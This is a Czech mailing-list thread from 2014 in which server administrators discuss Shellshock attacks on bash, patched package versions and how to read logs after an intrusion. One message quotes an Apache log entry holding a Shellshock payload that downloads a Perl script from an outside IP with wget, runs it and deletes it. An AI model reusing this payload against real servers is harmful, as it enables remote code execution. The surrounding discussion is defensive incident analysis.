[vpsFree.cz: community-list] Útoky na bash běží

[redacted] redacted at gmail.com
Mon Sep 29 10:31:23 CEST 2014


Ahoj,

a pokud mám podle logu apt, že byl bash verze 4.2+dfsg-0.1+deb7u1 instalován 2014-09-24 16:38:33, ale v logu Apache mám záznam s HTTP kódem 200 ze dne 2014-09-27 00:33:55, tak to mám chápat jak?

/var/www/0ops/log/access.log:70.42.149.68 - - [27/Sep/2014:00:33:55 +0200] "GET / HTTP/1.0" 200 643 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""

redacted

29. 9. 2014 v 10:24, Jiří Medvěd <admin at jirimedved.cz>:

> Podepsáno PGP část
> Ahoj,
> ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
> 
> Medved
> 
> Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
> > Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá
> > fixnutou verzi v repozitářích, že ne? A co s tím?
> >
> > Honza
> >
> > 29. 9. 2014 v 10:10, Michal Miklos <mimik at mimik.sk>:
> >
> >> jedine si zistit ci mas dobru verziu bashu.
> >>
> >>
> >>> On 29 Sep 2014, at 10:08, Jan B. Kolář
> >>> <janbivoj.kolar at zazen-nudu.cz> wrote:
> >>>
> >>> Ahoj,
> >>>
> >>> možná hloupá otázka - dá se nějak z logu zjistit, zda ten
> >>> průnik byl úspěšný či nikoliv?
> >>>
> >>> Honza
> >>>
> >>>> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57
> >>>> Jiří Medvěd napsal(a):
> >>>>> Hele,
> >>>>>
> >>>>> z jineho stroje:
> >>>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
> >>>> rootkit:
> >>>>
> >>>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
> >>>
> >>>
> >>>>
> _______________________________________________
> >>> Community-list mailing list Community-list at lists.vpsfree.cz
> >>> http://lists.vpsfree.cz/listinfo/community-list
> >>
> >> _______________________________________________ Community-list
> >> mailing list Community-list at lists.vpsfree.cz
> >> http://lists.vpsfree.cz/listinfo/community-list
> > _______________________________________________ Community-list
> > mailing list Community-list at lists.vpsfree.cz
> > http://lists.vpsfree.cz/listinfo/community-list
> >
> 
> _______________________________________________
> Community-list mailing list
> Community-list at lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.vpsfree.cz/pipermail/community-list/attachments/20140929/00b33800/attachment-0002.html>


More information about the Community-list mailing list